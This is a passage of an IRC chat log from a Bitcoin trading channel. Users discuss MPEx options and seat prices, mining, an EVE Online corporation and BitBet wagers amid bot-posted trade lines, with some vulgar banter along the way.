books like on mpex...i took one look at mpex and besides the standard buy and sell prices didnt know what the hell i was reading. Aug 31 01:44:01 hmmm, no hot chix were around when i made photos Aug 31 01:44:42 bid/ask, last trade, min/max prices past 30 days and day/month volumes Aug 31 01:45:56 no i mean like this: X.IDIFF.JUN Aug 31 01:45:58 [BTCTC] [DMS.SELLING] 2 @ 0.01289 = 0.0258 BTC [+] Aug 31 01:46:01 obv that means june Aug 31 01:46:08 but for what and what what? Aug 31 01:46:13 click on it see the contract neh ? Aug 31 01:46:26 well thats helpful Aug 31 01:46:30 jurov your futures are too expensive! <<< drop me some TAT. stuff and short them then! Aug 31 01:46:32 lol sorry Aug 31 01:47:03 any big winners or losers lately mircea with your options? Aug 31 01:47:56 nah, very low volume Aug 31 01:48:23 they're pretty much too difficult to price it seems. Aug 31 01:49:39 right now what would be your premium for 10 BTC with $140 strike price be? Call. Aug 31 01:50:14 $depth O.USD.C140T Aug 31 01:50:16 mircea_popescu: An error has occurred and has been logged. Please contact this bot's administrator for more information. Aug 31 01:50:16 im curious to know how high u guys have to be with your premiums to be profitable, thinking of offering options and futures for small amounts. Aug 31 01:50:20 you know it's not that hard to check on your own Aug 31 01:50:37 oh okay Aug 31 01:50:40 now that u said it Aug 31 01:50:44 i can find it easily Aug 31 01:50:48 $depth O.USD.C140N Aug 31 01:50:49 mircea_popescu: O.USD.C140N Bids: ['1000 @ 0.0539499'] Aug 31 01:50:50 mircea_popescu: Asks: ['1000 @ 0.39509381'] Aug 31 01:50:52 t's are about to expire Aug 31 01:51:10 are Ts tuesday, Ns are wednesday? Aug 31 01:51:18 t;s are this month, n are next month Aug 31 01:51:22 oh nvm Aug 31 01:51:25 read it Aug 31 01:51:34 [BTCTC] [TAT.ASICMINER] 37 @ 0.02401 = 0.8884 BTC [-] Aug 31 01:51:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.02401 BTC [-] Aug 31 01:52:13 can u buy less then 1000? Aug 31 01:52:28 i would assume so. Aug 31 01:52:29 yea, you can buy 1 Aug 31 01:52:33 okay cool Aug 31 01:52:44 each contract is for 1 btc mind you. Aug 31 01:54:24 ;;last labcoin Aug 31 01:54:24 (last [--{from,in,on,with,without,regexp} ] [--nolimit]) -- Returns the last message matching the given criteria. --from requires a nick from whom the message came; --in requires a channel the message was sent to; --on requires a network the message was sent on; --with requires some string that had to be in the message; --regexp requires a regular expression the message must (1 more message) Aug 31 01:56:56 are there any sites that allow u to offer futures of your own? Aug 31 01:57:14 you can write your own options on mpex. Aug 31 01:57:22 my thought is in BTC world how do i make sure i get my end of the contract at the end of the length of time. Aug 31 01:57:25 you can't really make futures anywhere, atm. Aug 31 01:57:36 yeah makes sense why Aug 31 02:00:42 [BTCTC] [ASICMINER-PT] 1 @ 2.556 BTC [-] Aug 31 02:01:11 what is the price based on for your USD options mircea? bitstamp? Aug 31 02:02:05 $avg Aug 31 02:02:07 mircea_popescu: 131.20 Aug 31 02:02:07 that. Aug 31 02:02:20 oh ok Aug 31 02:03:26 so essentually i can buy an option for $128 strike price at .079 fee, thats like $136 overall or so. Aug 31 02:03:33 $137 Aug 31 02:03:42 thats not too bad, prices shoot up nonstop. Aug 31 02:03:53 they move ~15% range id say every month Aug 31 02:04:54 [BTCTC] [LABCOIN] 42 @ 0.003495 = 0.1468 BTC [-] Aug 31 02:07:50 [BTCTC] [LABCOIN] 219 @ 0.003495 = 0.7654 BTC [-] Aug 31 02:08:49 [BTCTC] [CRYPTO-TRADE] 4 @ 0.2 = 0.8 BTC [+] Aug 31 02:08:58 i assume many of your offers are all robot based, do u have a set ROI u set your options at mircea? Like an edge of 5% for you or higher. Aug 31 02:10:00 kingofsports: perhaps look up the MPOE reports? Aug 31 02:10:21 [HAVELOCK] [XBOND] 20 @ 0.00119 = 0.0238 BTC [+] Aug 31 02:11:03 [BTCTC] [LABCOIN] 25 @ 0.003496 = 0.0874 BTC [+] Aug 31 02:11:06 https://www.facebook.com/photo.php?fbid=191014694413529&set=gm.157183037814453&type=1&theater lulzy order book Aug 31 02:11:39 if you wanted btc cheaply, you should have been there :) Aug 31 02:14:11 [BTCTC] [LABCOIN] 95 @ 0.0035 = 0.3325 BTC [+] Aug 31 02:16:43 jurov what settlement method did you use ? Aug 31 02:16:49 fixing or what Aug 31 02:17:02 ad hoc Aug 31 02:17:20 aha Aug 31 02:17:21 there was no recognizable system Aug 31 02:19:04 [BTCTC] [LABCOIN] 1431 @ 0.0035 = 5.0085 BTC [+] Aug 31 02:21:31 [BTCTC] [BASIC-MINING] 1 @ 0.1976 BTC [-] Aug 31 02:24:14 [BTCTC] [LTC-ATF.B2] 1 @ 0.01039 BTC [-] Aug 31 02:29:42 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Aug 31 02:30:21 [BTCTC] [ACTIVEMINING] 2 @ 0.004546 = 0.0091 BTC [+] Aug 31 02:30:39 [BTCTC] [ASICMINER-PT] 1 @ 2.494 BTC [-] Aug 31 02:36:43 [HAVELOCK] [AM100] 6 @ 0.0254 = 0.1524 BTC [-] Aug 31 02:36:46 [BTCTC] [TAT.ASICMINER] 10 @ 0.02401 = 0.2401 BTC [-] Aug 31 02:36:47 [BTCTC] [TAT.ASICMINER] 45 @ 0.024 = 1.08 BTC [-] Aug 31 02:37:30 http://i.imgur.com/qNkRGvP.jpg Aug 31 02:37:33 ops Aug 31 02:39:08 well since i pasted it here and its only second half, heres the first one to put it in context http://i.imgur.com/VsfvHEE.jpg Aug 31 02:49:58 kakobrekla: you know universe was created by Eris first? Aug 31 02:50:17 then she said screw dat and left it all to that impostor Aug 31 02:50:21 with or without the assholes? Aug 31 02:50:40 the impostor added the assholes as per his taste Aug 31 02:50:52 [BTCTC] [LABCOIN] 1 @ 0.0035 BTC [+] Aug 31 02:51:01 hm ok Aug 31 02:51:16 [BTCTC] [LABCOIN] 5 @ 0.0035 = 0.0175 BTC [+] Aug 31 02:54:28 Yes, that's true in some sense, false in some sense, and true and false in some sense. Aug 31 02:54:47 https://www.youtube.com/watch?v=M3YElLVMjEs Aug 31 02:54:49 Assholes - YouTube Aug 31 02:55:18 [MPEX] [S.MPOE] 8945 @ 0.00086581 = 7.7447 BTC [-] Aug 31 02:55:20 [MPEX] [S.MPOE] 11455 @ 0.0008655 = 9.9143 BTC [-] Aug 31 02:57:10 jurov wasn't it sophie ? what eris. Aug 31 02:57:31 eris aka discordia is jus' some bitchy slut. Aug 31 02:58:07 and sophie isn't? Aug 31 02:58:39 sophie just likes suckling the cock. Aug 31 02:59:16 [BTCTC] [BASIC-MINING] 2 @ 0.1974 = 0.3948 BTC [-] Aug 31 03:00:27 seems a good disguise. Aug 31 03:03:03 http://www.wired.com/wiredenterprise/2013/08/litecoin a better bitcoin, no less Aug 31 03:03:06 Ex-Googler Gives the World a Better Bitcoin | Wired Enterprise | Wired.com Aug 31 03:03:53 because it’s a more credible alternative to the growing list of Bitcoin imitators Aug 31 03:08:39 pankkake the press. fit to clean windows with. Aug 31 03:12:53 [BTCTC] [LABCOIN] 40 @ 0.003598 = 0.1439 BTC [+] Aug 31 03:13:38 [BTCTC] [NASTY-PT] 1 @ 0.002668 BTC [-] Aug 31 03:13:49 [MPEX] [S.MPOE] 6300 @ 0.00086732 = 5.4641 BTC [+] Aug 31 03:15:12 [BTCTC] [NASTY-PT] 1 @ 0.002668 BTC [-] Aug 31 03:17:21 [BTCTC] [BTC-BOND] 10 @ 0.00995 = 0.0995 BTC [-] Aug 31 03:17:22 [BTCTC] [BTC-BOND] 7 @ 0.0099 = 0.0693 BTC [-] Aug 31 03:17:23 [BTCTC] [BTC-BOND] 200 @ 0.009814 = 1.9628 BTC [-] Aug 31 03:17:24 [BTCTC] [BTC-BOND] 46 @ 0.009813 = 0.4514 BTC [-] Aug 31 03:17:25 [BTCTC] [BTC-BOND] 99 @ 0.009812 = 0.9714 BTC [-] Aug 31 03:17:26 [BTCTC] [BTC-BOND] 1 @ 0.009807 BTC [-] Aug 31 03:17:28 [BTCTC] [BTC-BOND] 27 @ 0.009805 = 0.2647 BTC [-] Aug 31 03:18:13 [BTCTC] [LABCOIN] 202 @ 0.003598 = 0.7268 BTC [+] Aug 31 03:18:15 [BTCTC] [LABCOIN] 848 @ 0.0036 = 3.0528 BTC [+] Aug 31 03:18:43 [BTCTC] [LABCOIN] 11 @ 0.003598 = 0.0396 BTC [-] Aug 31 03:19:03 [HAVELOCK] [AM100] 100 @ 0.0254 = 2.54 BTC [-] Aug 31 03:19:15 [HAVELOCK] [AM100] 10 @ 0.0254 = 0.254 BTC [-] Aug 31 03:23:59 http://trilema.com/2013/mpoe-august-2013-statement/ Aug 31 03:24:01 MPOE, August 2013 Statement pe Trilema - Un blog de Mircea Popescu. Aug 31 03:24:27 provisional statement, open to comment. will become definitive in a day, and payments owed going out by monday. Aug 31 03:26:59 [BTCTC] [ACTIVEMINING] 40 @ 0.00459 = 0.1836 BTC [+] Aug 31 03:27:41 [BTCTC] [ACTIVEMINING] 6 @ 0.004591 = 0.0275 BTC [+] Aug 31 03:28:18 [BTCTC] [ACTIVEMINING] 1 @ 0.00459 BTC [-] Aug 31 03:31:55 1`779.1269145 BTC Aug 31 03:31:57 O.O Aug 31 03:32:03 \o/ Aug 31 03:33:24 ya, such a month... Aug 31 03:35:22 wow, you really consider the eve bsnss serious Aug 31 03:35:55 hey, it's the billionz! Aug 31 03:36:18 can;'t argye with them billionz. Aug 31 03:36:29 haha. goodnight. Aug 31 03:36:44 lter Aug 31 03:39:12 lol you have an EVE Online corp mircea_popescu ? Aug 31 03:39:39 grubles yup. Aug 31 03:39:43 it's called 1Bitcoin Aug 31 03:39:59 interesting Aug 31 03:40:20 lolz people feeling the 20 indian lawyers to crush BFL and avalon Aug 31 03:40:26 the only reason I used to play that game was to infiltrate corps and steal stuff Aug 31 03:40:54 grubles so do you have a buncha stuff ? Aug 31 03:41:04 [BTCTC] [ACTIVEMINING] 1000 @ 0.0045 = 4.5 BTC [-] Aug 31 03:41:07 nah i dont play anymore Aug 31 03:41:20 VanCleef how's that goin' ? Aug 31 03:41:33 good mate Aug 31 03:41:45 didnt you have one such inflitration mp? Aug 31 03:42:31 well was some guy that blew up mah sheep Aug 31 03:42:42 we will crush our enemy and eat their children Aug 31 03:42:47 not sure how he'd have gotten anything out of it tho Aug 31 03:45:37 your sheep? Aug 31 03:47:08 mah sheep Aug 31 03:47:26 grubles how do you steal stuff in the game? Aug 31 03:48:22 same way as bitcoin Aug 31 03:48:29 you get idiots to give it to you. Aug 31 03:49:51 dont they have wot? :) Aug 31 03:49:56 nope Aug 31 03:49:59 real primitive schmucks Aug 31 03:50:07 been at it for ten years, they don't have toilet paper. Aug 31 03:50:20 friend of mine made this game - https://www.youtube.com/watch?v=MhmB5bioAGs Aug 31 03:50:24 it got pretty popular Aug 31 03:50:25 but i plan to weave the wot in. Aug 31 03:50:51 should bring it over to s.mg Aug 31 03:51:18 how? Aug 31 03:51:48 VanCleef sure, tell your friend to drp by. Aug 31 03:51:59 kakobrekla for instance by requiring wot presence for promoting ppl in soc Aug 31 03:57:37 [BTCTC] [LABCOIN] 1 @ 0.003598 BTC [-] Aug 31 03:57:39 [BTCTC] [ACTIVEMINING] 25 @ 0.004588 = 0.1147 BTC [+] Aug 31 04:06:29 kakobrekla, rise up enough positions in a corp for them to trust you enough to give you access to tons of ore / materials / blueprints / ships etc. Aug 31 04:06:45 then you do them dirty Aug 31 04:09:16 grubles i gout about a billion in ore in corp hangar right now. Aug 31 04:09:41 i wouldnt worry much about ore Aug 31 04:09:45 since its a bitch to transport Aug 31 04:10:29 it's metal not ore. Aug 31 04:10:33 mah bad. Aug 31 04:10:41 i just learned how to refine the shit. Aug 31 04:10:45 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [+] Aug 31 04:10:46 [BTCTC] [ASICMINER-PT] 5 @ 2.5 = 12.5 BTC [-] Aug 31 04:10:48 [BTCTC] [ASICMINER-PT] 4 @ 2.5 = 10 BTC [-] Aug 31 04:10:52 ah Aug 31 04:10:57 [BTCTC] [COG.F2] 2 @ 4.998 = 9.996 BTC [+] Aug 31 04:11:19 kinda fun http://www.reddit.com/r/Bitcoin/comments/1lfobc/i_am_a_timetraveler_from_the_future_here_to_beg/ Aug 31 04:11:43 http://www.google.com/url?sa=t&rct=j&q=heroin%20shooting%20in%20the%20eye%C2%AD%20ball&source=web&cd=4&cad=rja&ved=0CEoQFjAD&url=http%3A%2F%2Fanswers.yahoo.com%2Fquestion%2Findex%3Fqid%3D20060907171058AA40dqM&ei=wkIhUuSwKZKHswac24HYCw&usg=AFQjCNE7q3tt1XJEm8CEzlMTTa0eO9KODQ&bvm=bv.51495398,d.Yms Aug 31 04:11:48 uh sorry Aug 31 04:11:57 http://answers.yahoo.com/question/index?qid=20060907171058AA40dqM Aug 31 04:12:00 Is it safe to shoot heroin into your eyeball? - Yahoo Answers Aug 31 04:12:33 [HAVELOCK] [AM100] 10 @ 0.02520001 = 0.252 BTC [-] Aug 31 04:12:35 seems like a good idea Aug 31 04:12:36 [HAVELOCK] [AM100] 5 @ 0.0252 = 0.126 BTC [-] Aug 31 04:12:38 [HAVELOCK] [AM100] 6 @ 0.02515 = 0.1509 BTC [-] Aug 31 04:12:40 [HAVELOCK] [AM100] 10 @ 0.02512 = 0.2512 BTC [-] Aug 31 04:12:42 [HAVELOCK] [AM100] 5 @ 0.02501 = 0.1251 BTC [-] Aug 31 04:12:43 what could possibly go wrong. Aug 31 04:12:44 [HAVELOCK] [AM100] 13 @ 0.02500011 = 0.325 BTC [-] Aug 31 04:12:46 [HAVELOCK] [AM100] 8 @ 0.0250001 = 0.2 BTC [-] Aug 31 04:12:48 [HAVELOCK] [AM100] 13 @ 0.02500001 = 0.325 BTC [-] Aug 31 04:12:50 [HAVELOCK] [AM100] 20 @ 0.025 = 0.5 BTC [-] Aug 31 04:13:12 [HAVELOCK] [AM1] 1 @ 2.55 BTC [-] Aug 31 04:16:00 uggh spentbthe day working like a 110 degrees here, also setting up blades. i wish they had made them easier to mount Aug 31 04:17:22 jborkl listen, there was a guy with heat stroke Aug 31 04:17:34 don't mine in overwarm places Aug 31 04:18:13 well it isbhot as shit here Aug 31 04:18:20 [BTCTC] [BASIC-MINING] 9 @ 0.185 = 1.665 BTC [-] Aug 31 04:18:38 i need a cave like activeminer Aug 31 04:18:50 where's that? arizona? Aug 31 04:18:57 texaa Aug 31 04:19:20 ah, werd. Aug 31 04:19:35 lol actiminer dreamed up a cave for themselves ? Aug 31 04:19:56 they have pics and everythinh Aug 31 04:20:00 link ? Aug 31 04:20:21 lemme see if i can find it Aug 31 04:20:40 [BTCTC] [LABCOIN] 1198 @ 0.0036 = 4.3128 BTC [+] Aug 31 04:20:41 [BTCTC] [LABCOIN] 374 @ 0.0036 = 1.3464 BTC [+] Aug 31 04:20:42 [BTCTC] [LABCOIN] 207 @ 0.003638 = 0.7531 BTC [+] Aug 31 04:20:43 [BTCTC] [LABCOIN] 377 @ 0.003656 = 1.3783 BTC [+] Aug 31 04:20:44 [BTCTC] [LABCOIN] 100 @ 0.003666 = 0.3666 BTC [+] Aug 31 04:20:45 [BTCTC] [LABCOIN] 99 @ 0.003666 = 0.3629 BTC [+] Aug 31 04:20:46 [BTCTC] [LABCOIN] 440 @ 0.00368 = 1.6192 BTC [+] Aug 31 04:20:47 [BTCTC] [LABCOIN] 100 @ 0.003688 = 0.3688 BTC [+] Aug 31 04:20:48 [BTCTC] [LABCOIN] 97 @ 0.003693 = 0.3582 BTC [+] Aug 31 04:20:49 [BTCTC] [LABCOIN] 1400 @ 0.003693 = 5.1702 BTC [+] Aug 31 04:20:51 [BTCTC] [LABCOIN] 89 @ 0.003693 = 0.3287 BTC [+] Aug 31 04:23:39 i cant find it mp, butbthey have a cave in alabama? cant remember the state Aug 31 04:24:07 they "have" a cave ? how ? isn't it protected by some authority ? did they buy or lease ? Aug 31 04:24:11 i saw a picture so you know it is true Aug 31 04:24:14 lol Aug 31 04:24:14 does it flood ? etc. Aug 31 04:24:23 what if bats move in. Aug 31 04:24:38 what if they accidentally kill a migratory swan with the fans on a case Aug 31 04:24:53 supposed to be some huge dataxenter that uses it causebit is like 58 degrees Aug 31 04:25:20 endangered beetles are all the rage Aug 31 04:26:23 is it in russell cave ? Aug 31 04:26:24 :D Aug 31 04:27:15 man that was a lot of work getting those setup before the long weekend Aug 31 04:27:27 got them this am, all done Aug 31 04:28:10 [BTCTC] [LABCOIN] 138 @ 0.003695 = 0.5099 BTC [+] Aug 31 04:28:11 [BTCTC] [LABCOIN] 80 @ 0.003697 = 0.2958 BTC [+] Aug 31 04:28:12 [BTCTC] [LABCOIN] 235 @ 0.0037 = 0.8695 BTC [+] Aug 31 04:28:12 [BTCTC] [LABCOIN] 5 @ 0.0037 = 0.0185 BTC [+] Aug 31 04:28:14 [BTCTC] [LABCOIN] 7871 @ 0.0037 = 29.1227 BTC [+] Aug 31 04:28:41 [BTCTC] [LABCOIN] 138 @ 0.003698 = 0.5103 BTC [-] Aug 31 04:28:43 [BTCTC] [LABCOIN] 80 @ 0.0037 = 0.296 BTC [+] Aug 31 04:32:33 [BTCTC] [LABCOIN] 50 @ 0.003739 = 0.187 BTC [+] Aug 31 04:32:34 [BTCTC] [LABCOIN] 100 @ 0.003741 = 0.3741 BTC [+] Aug 31 04:32:36 [BTCTC] [LABCOIN] 888 @ 0.003742 = 3.3229 BTC [+] Aug 31 04:32:37 [BTCTC] [LABCOIN] 100 @ 0.003743 = 0.3743 BTC [+] Aug 31 04:32:38 [BTCTC] [LABCOIN] 98 @ 0.003748 = 0.3673 BTC [+] Aug 31 04:32:39 [BTCTC] [LABCOIN] 415 @ 0.00376 = 1.5604 BTC [+] Aug 31 04:32:40 [BTCTC] [LABCOIN] 377 @ 0.003765 = 1.4194 BTC [+] Aug 31 04:32:41 [BTCTC] [LABCOIN] 2000 @ 0.00377 = 7.54 BTC [+] Aug 31 04:32:49 [BTCTC] [DMS.MINING] 2 @ 0.00335 = 0.0067 BTC [+] Aug 31 04:33:29 [HAVELOCK] [AM100] 1 @ 0.02461 BTC [-] Aug 31 04:33:31 [HAVELOCK] [AM100] 20 @ 0.0246 = 0.492 BTC [-] Aug 31 04:33:34 [HAVELOCK] [AM100] 10 @ 0.0244 = 0.244 BTC [-] Aug 31 04:33:36 [HAVELOCK] [AM100] 20 @ 0.02431 = 0.4862 BTC [-] Aug 31 04:33:38 [HAVELOCK] [AM100] 10 @ 0.0242 = 0.242 BTC [-] Aug 31 04:33:40 [HAVELOCK] [AM100] 10 @ 0.0242 = 0.242 BTC [-] Aug 31 04:33:42 [HAVELOCK] [AM100] 25 @ 0.02419901 = 0.605 BTC [-] Aug 31 04:33:45 [BTCTC] [LTC-ATF.B2] 14 @ 0.01039 = 0.1455 BTC [-] Aug 31 04:34:01 [HAVELOCK] [AM100] 8 @ 0.023 = 0.184 BTC [-] Aug 31 04:34:04 [HAVELOCK] [AM100] 20 @ 0.0226 = 0.452 BTC [-] Aug 31 04:34:05 [HAVELOCK] [AM100] 50 @ 0.0225 = 1.125 BTC [-] Aug 31 04:34:07 [HAVELOCK] [AM100] 1 @ 0.022 BTC [-] Aug 31 04:34:09 [HAVELOCK] [AM100] 20 @ 0.022 = 0.44 BTC [-] Aug 31 04:34:11 [HAVELOCK] [AM100] 18 @ 0.022 = 0.396 BTC [-] Aug 31 04:34:14 [HAVELOCK] [AM100] 22 @ 0.02191 = 0.482 BTC [-] Aug 31 04:34:16 [HAVELOCK] [AM100] 145 @ 0.02161 = 3.1335 BTC [-] Aug 31 04:35:19 [BTCTC] [DMS.MINING] 19 @ 0.00335 = 0.0637 BTC [+] Aug 31 04:38:29 [BTCTC] [LABCOIN] 2 @ 0.003785 = 0.0076 BTC [+] Aug 31 04:38:53 [HAVELOCK] [SMG] 341 @ 0.0002229 = 0.076 BTC [+] Aug 31 04:39:01 [HAVELOCK] [SMG] 342 @ 0.0002228 = 0.0762 BTC [-] Aug 31 04:39:11 [HAVELOCK] [SMG] 1149 @ 0.00022001 = 0.2528 BTC [-] Aug 31 04:39:13 [HAVELOCK] [AM100] 5 @ 0.0254 = 0.127 BTC [+] Aug 31 04:39:19 [HAVELOCK] [SMG] 9 @ 0.00022 = 0.002 BTC [-] Aug 31 04:39:29 [HAVELOCK] [SMG] 385 @ 0.0002102 = 0.0809 BTC [-] Aug 31 04:39:31 [HAVELOCK] [SMG] 942 @ 0.00021001 = 0.1978 BTC [-] Aug 31 04:39:53 [BTCTC] [LABCOIN] 708 @ 0.003785 = 2.6798 BTC [+] Aug 31 04:39:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.02479 BTC [+] Aug 31 04:41:18 [BTCTC] [LABCOIN] 100 @ 0.003788 = 0.3788 BTC [+] Aug 31 04:41:19 [BTCTC] [LABCOIN] 117 @ 0.00379 = 0.4434 BTC [+] Aug 31 04:41:20 [BTCTC] [LABCOIN] 373 @ 0.00379 = 1.4137 BTC [+] Aug 31 04:43:12 [BTCTC] [LABCOIN] 2 @ 0.00379 = 0.0076 BTC [+] Aug 31 04:45:26 [MPEX] [S.MPOE] 5991 @ 0.00086802 = 5.2003 BTC [+] Aug 31 04:49:44 [BTCTC] [LABCOIN] 4625 @ 0.00379 = 17.5288 BTC [+] Aug 31 04:49:44 [BTCTC] [LABCOIN] 2500 @ 0.00379 = 9.475 BTC [+] Aug 31 04:49:45 [BTCTC] [LABCOIN] 1546 @ 0.00379 = 5.8593 BTC [+] Aug 31 04:56:00 [BTCTC] [LABCOIN] 1400 @ 0.003796 = 5.3144 BTC [+] Aug 31 05:01:11 [HAVELOCK] [AM1] 9 @ 2.55 = 22.95 BTC [-] Aug 31 05:07:41 [BTCTC] [LABCOIN] 1 @ 0.003715 BTC [-] Aug 31 05:11:10 [BTCTC] [LABCOIN] 29 @ 0.003715 = 0.1077 BTC [-] Aug 31 05:11:38 [BTCTC] [DMS.MINING] 29 @ 0.00335 = 0.0972 BTC [+] Aug 31 05:11:40 [BTCTC] [DMS.MINING] 52 @ 0.00335 = 0.1742 BTC [+] Aug 31 05:14:00 [BTCTC] [LABCOIN] 5 @ 0.003715 = 0.0186 BTC [-] Aug 31 05:17:23 .d Aug 31 05:17:23 65750060.14908 | Next Diff in 874 blocks | Estimated Change: 21.8359% in 4d 17h 39m 3s Aug 31 05:19:31 [BTCTC] [LABCOIN] 576 @ 0.003727 = 2.1468 BTC [+] Aug 31 05:19:33 [BTCTC] [LABCOIN] 20 @ 0.003726 = 0.0745 BTC [-] Aug 31 05:19:34 [BTCTC] [LABCOIN] 2904 @ 0.003725 = 10.8174 BTC [-] Aug 31 05:27:31 [BTCTC] [LABCOIN] 576 @ 0.003727 = 2.1468 BTC [+] Aug 31 05:27:32 [BTCTC] [LABCOIN] 17096 @ 0.003725 = 63.6826 BTC [-] Aug 31 05:28:31 damn 63 btc Aug 31 05:31:36 need bitcoinz to buy mpex seats with. Aug 31 05:32:26 mircea_popescu how much is a seat? Aug 31 05:32:38 30 Aug 31 05:33:24 that's not so bad Aug 31 05:33:28 does that price ever change? Aug 31 05:33:37 like if the exchange rate changes a lot? Aug 31 05:34:00 it does go up. Aug 31 05:34:03 was 20 for a while in 2012 Aug 31 05:34:12 [BTCTC] [ASICMINER-PT] 1 @ 2.56 BTC [+] Aug 31 05:34:18 eventually it will exceed 20mn and no more seats will be created. Aug 31 05:34:21 heh Aug 31 05:34:30 how many seats do you have now? Aug 31 05:34:45 like how many have been bought Aug 31 05:36:01 http://trilema.com/2013/mpex-paid-accounts/ Aug 31 05:36:04 MPEx paid accounts pe Trilema - Un blog de Mircea Popescu. Aug 31 05:36:06 that's like the most recent discussion Aug 31 05:36:23 you can go through the reports since then to figure it out Aug 31 05:38:02 I am too lazy to do that Aug 31 05:38:38 Rough estimate from your graph is in the 100-200 zone Aug 31 05:41:41 [BTCTC] [LABCOIN] 20 @ 0.003784 = 0.0757 BTC [+] Aug 31 05:41:42 [BTCTC] [LABCOIN] 239 @ 0.003785 = 0.9046 BTC [+] Aug 31 05:44:33 [BTCTC] [DMS.SELLING] 10 @ 0.01268 = 0.1268 BTC [-] Aug 31 05:44:35 [BTCTC] [DMS.SELLING] 68 @ 0.01265 = 0.8602 BTC [-] Aug 31 05:54:05 something like that back then. Aug 31 05:57:43 did assbot use to display mpex trades? Aug 31 06:00:24 VanCleef: it always has, and still does. Aug 31 06:00:47 [BTCTC] [ACTIVEMINING] 5 @ 0.004577 = 0.0229 BTC [-] Aug 31 06:03:19 okey, i only see btct and havelock Aug 31 06:04:01 nature of bitcoin, you gotta dig through a whole lot of bs to find the real stuff. Aug 31 06:06:36 ha Aug 31 06:08:37 [HAVELOCK] [AM100] 1 @ 0.02339 BTC [-] Aug 31 06:08:43 [BTCTC] [DMS.MINING] 60 @ 0.00337 = 0.2022 BTC [+] Aug 31 06:10:01 you mod6 Aug 31 06:10:04 where u at Aug 31 06:10:19 in the wirez Aug 31 06:10:21 [MPEX] [S.MPOE] 8595 @ 0.0008655 = 7.439 BTC [-] Aug 31 06:10:21 [MPEX] [S.MPOE] 4005 @ 0.00086424 = 3.4613 BTC [-] Aug 31 06:10:24 OH NOEZ Aug 31 06:10:31 m00 Aug 31 06:10:36 otter Aug 31 06:10:38 slap slap Aug 31 06:10:39 lol Aug 31 06:11:35 heheh Aug 31 06:11:55 [HAVELOCK] [CFIG] 2 @ 0.165 = 0.33 BTC [-] Aug 31 06:12:08 bitotterbot swims in teh ether Aug 31 06:12:24 [BTCTC] [DMS.PURCHASE] 500 @ 0.01591 = 7.955 BTC [-] Aug 31 06:13:12 [HAVELOCK] [CFIG] 3 @ 0.165 = 0.495 BTC [-] Aug 31 06:14:22 mircea_popescu is there anyone who will purchase 1BTC shares for Isk? Aug 31 06:14:23 ;D Aug 31 06:14:34 already happened. Aug 31 06:15:41 [BTCTC] [BTC-BOND] 100 @ 0.009999 = 0.9999 BTC [+] Aug 31 06:15:45 [MPEX] [S.MPOE] 4400 @ 0.0008665 = 3.8126 BTC [+] Aug 31 06:15:47 [MPEX] [S.MPOE] 3067 @ 0.00086802 = 2.6622 BTC [+] Aug 31 06:15:48 but does it happen recurringly? Aug 31 06:15:57 as in at any time is someone wanting to buy stock? Aug 31 06:16:07 (liquidity I guess is the word, or liquidity with ISK) Aug 31 06:16:27 well yes, im mming it currently Aug 31 06:16:37 tho in the future i imagine there'll be people doing it Aug 31 06:16:56 cool that's gangsta Aug 31 06:16:59 you got me wanting to paly Aug 31 06:17:12 in fact I'm going to start playing again because of that Aug 31 06:17:19 jurov Aug 31 06:17:22 where u at Aug 31 06:18:06 lol Aug 31 06:20:46 i need to perhaps build my first gaming machine ever so i can play eulora ... i might start or try out eve too. but im such a n00b. Aug 31 06:21:38 i was like, a super-n00b when testing eulora. Aug 31 06:24:07 Eve you can just trade shit that the corp has in stock if you know the supply and demand of the zones. Aug 31 06:24:58 mircea_popescu: does 1BTC have any miners? Aug 31 06:25:03 yup Aug 31 06:25:22 there's bns worth of shit in the corp stores, and a policy enabling trading in the first place. Aug 31 06:25:32 hi guys Aug 31 06:25:33 mod6 haha i corrupt Aug 31 06:25:40 haha. Aug 31 06:25:45 hi Pickaxe_Included Aug 31 06:25:53 on bets of bitcoin if i bet on my own new bet and it gets rejected....do i get my btc back? Aug 31 06:25:59 bitbet down Aug 31 06:25:59 yes. Aug 31 06:26:04 believe so Aug 31 06:26:16 Neil i see it ? Aug 31 06:26:24 na its up for me too Aug 31 06:26:33 Pickaxe_Included you get it usually on the next block. Aug 31 06:26:34 Hmm weird Aug 31 06:26:39 i screwed up and put in a duplicate bet that ends sooner Aug 31 06:27:00 well it matches another active bet Aug 31 06:27:01 Down for me; other sites are fine. Aug 31 06:27:10 neil try a web proxy ? Aug 31 06:27:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.02401 = 0.2401 BTC [-] Aug 31 06:27:32 does anyone 'make a living' off of bets of bitcoin? like could i in theory create 100 new bets everyday and the winners get me paid? Aug 31 06:27:39 It was there 5 mines ago; I'll just wait a few mins.# Aug 31 06:28:06 Now it's back. *shrug* Aug 31 06:28:18 [BTCTC] [TAT.ASICMINER] 60 @ 0.024 = 1.44 BTC [-] Aug 31 06:28:39 [BTCTC] [LABCOIN] 5 @ 0.003645 = 0.0182 BTC [-] Aug 31 06:28:40 [BTCTC] [LABCOIN] 20 @ 0.003644 = 0.0729 BTC [-] Aug 31 06:28:42 [BTCTC] [LABCOIN] 169 @ 0.003585 = 0.6059 BTC [-] Aug 31 06:29:06 mircea_popescu: If I want to bet on the side the house gave me at the start of the bet (i.e. the 0.0x freebie) can I send to the send to address for those house ones too, just like one I request myself? Aug 31 06:30:04 [BTCTC] [S.MPOE-PT] 140 @ 0.0007803 = 0.1092 BTC [+] Aug 31 06:30:16 Never mind I'll just get a new address Aug 31 06:31:25 [BTCTC] [BASIC-MINING] 1 @ 0.1751 BTC [-] Aug 31 06:31:27 [BTCTC] [BASIC-MINING] 5 @ 0.175 = 0.875 BTC [-] Aug 31 06:31:28 [BTCTC] [BASIC-MINING] 1 @ 0.1748 BTC [-] Aug 31 06:31:29 [BTCTC] [BASIC-MINING] 3 @ 0.174 = 0.522 BTC [-] Aug 31 06:34:42 [BTCTC] [BASIC-MINING] 1 @ 0.1743 BTC [+] Aug 31 06:34:54 [BTCTC] [ASICMINER-PT] 1 @ 2.56 BTC [+] Aug 31 06:35:26 [BTCTC] [ACTIVEMINING] 9 @ 0.004571 = 0.0411 BTC [-] Aug 31 06:38:10 Neil wauirt what ?! Aug 31 06:38:36 oh cause the house bet is linked to you hmm. i think we need to poll kakobrekla on thios one Aug 31 06:39:05 Yeah not obvious; and I don't want to be a source of gracious donations to shareholders :) Aug 31 06:39:45 I've 